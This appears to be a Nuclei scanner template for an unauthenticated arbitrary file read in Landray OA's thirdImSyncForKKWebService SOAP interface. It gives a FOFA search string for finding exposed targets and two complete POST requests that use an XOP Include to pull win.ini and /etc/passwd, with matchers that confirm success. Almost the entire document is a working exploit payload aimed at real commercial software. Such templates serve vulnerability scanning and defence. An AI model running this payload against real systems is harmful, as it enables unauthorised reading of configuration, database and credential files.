id: Landray-WebService-thirdImSyncForKKWebService-File-reading

info:
  name: 蓝凌OA WebService thirdImSyncForKKWebService 任意文件读取漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="Com_Parameter"
    蓝凌OA webservice服务 thirdImSyncForKKWebService 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
  reference:
    - https://mp.weixin.qq.com/s/Yf85VD7W_oQHKSF-GMZwMw?token=1066715859&lang=zh_CN
  tags: File reading


http:
  - raw:
      - |
        POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
        Connection: close
        Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
        SOAPAction: ""
        Accept-Encoding: gzip, deflate

        ------4upt9dwdca8rtwq9osuz
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
        <soapenv:Header/>
        <soapenv:Body>
            <web:sayHello>
                <arg0>
                    <beginTimeStamp>a</beginTimeStamp>
                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
                </arg0>
            </web:sayHello>
        </soapenv:Body>
        </soapenv:Envelope>
        ------4upt9dwdca8rtwq9osuz--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0'
          - 'Unmarshalling Error: 意外的文本'
        condition: and
      - type: status
        status: 
          - 500
  - raw:
      - |
        POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
        Connection: close
        Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
        SOAPAction: ""
        Accept-Encoding: gzip, deflate

        ------4upt9dwdca8rtwq9osuz
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
        <soapenv:Header/>
        <soapenv:Body>
            <web:sayHello>
                <arg0>
                    <beginTimeStamp>a</beginTimeStamp>
                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"/></count>
                </arg0>
            </web:sayHello>
        </soapenv:Body>
        </soapenv:Envelope>
        ------4upt9dwdca8rtwq9osuz--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'cm9vdDov'
          - 'L2Jpbi9iYXNo'
          - 'Unmarshalling Error: 意外的文本'
        condition: and
      - type: status
        status: 
          - 500

